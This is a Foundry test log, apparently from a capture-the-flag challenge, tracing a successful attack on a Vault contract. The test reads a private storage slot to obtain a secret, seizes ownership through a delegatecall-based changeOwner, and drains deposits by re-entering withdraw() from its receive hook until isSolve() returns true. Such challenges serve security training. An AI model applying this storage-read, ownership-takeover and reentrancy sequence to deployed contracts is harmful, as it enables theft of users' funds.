No files changed, compilation skipped

Ran 1 test for test/Vault.t.sol:VaultTest
[PASS] testDepositAndWithdraw() (gas: 88570)
Logs:
  -------attacked ------
  -------attacked ------

Traces:
  [108470] VaultTest::testDepositAndWithdraw()
    ├─ [0] VM::deal(VaultTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000000000000000 [1e18])
    │   └─ ← [Return] 
    ├─ [0] VM::startPrank(VaultTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   └─ ← [Return] 
    ├─ [0] VM::load(Vault: [0x3fC444Cd94a4eA6f6348A656826665ea61C83aFa], 0x0000000000000000000000000000000000000000000000000000000000000001) [staticcall]
    │   └─ ← [Return] 0x00000000000000000000000073ac20a031083b9eb17e83724ebb6ee5b457f079
    ├─ [8597] Vault::changeOwner(0x00000000000000000000000073ac20a031083b9eb17e83724ebb6ee5b457f079, VaultTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [5484] VaultLogic::changeOwner(0x00000000000000000000000073ac20a031083b9eb17e83724ebb6ee5b457f079, VaultTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Stop] 
    │   └─ ← [Stop] 
    ├─ [337] Vault::owner() [staticcall]
    │   └─ ← [Return] VaultTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]
    ├─ [0] VM::assertEq(VaultTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], VaultTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], "Owner was not changed correctly!") [staticcall]
    │   └─ ← [Return] 
    ├─ [22412] Vault::deposite{value: 1000000000000000000}()
    │   └─ ← [Stop] 
    ├─ [496] Vault::deposites(VaultTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1000000000000000000 [1e18]
    ├─ [0] VM::assertEq(1000000000000000000 [1e18], 1000000000000000000 [1e18], "Deposit amount is incorrect") [staticcall]
    │   └─ ← [Return] 
    ├─ [22458] Vault::openWithdraw()
    │   └─ ← [Stop] 
    ├─ [27965] Vault::withdraw()
    │   ├─ [20395] VaultTest::receive{value: 1000000000000000000}()
    │   │   ├─ [0] console::log("-------attacked ------") [staticcall]
    │   │   │   └─ ← [Stop] 
    │   │   ├─ [16432] Vault::withdraw()
    │   │   │   ├─ [8862] VaultTest::receive{value: 1000000000000000000}()
    │   │   │   │   ├─ [0] console::log("-------attacked ------") [staticcall]
    │   │   │   │   │   └─ ← [Stop] 
    │   │   │   │   ├─ [7399] Vault::withdraw()
    │   │   │   │   │   ├─ [0] VaultTest::receive{value: 1000000000000000000}()
    │   │   │   │   │   │   └─ ← [OutOfFunds] EvmError: OutOfFunds
    │   │   │   │   │   └─ ← [Stop] 
    │   │   │   │   └─ ← [Stop] 
    │   │   │   └─ ← [Stop] 
    │   │   └─ ← [Stop] 
    │   └─ ← [Stop] 
    ├─ [496] Vault::deposites(VaultTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::assertEq(0, 0, "Withdraw failed") [staticcall]
    │   └─ ← [Return] 
    ├─ [308] Vault::isSolve() [staticcall]
    │   └─ ← [Return] true
    └─ ← [Stop] 

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 5.71ms (1.47ms CPU time)

Ran 1 test suite in 214.77ms (5.71ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)
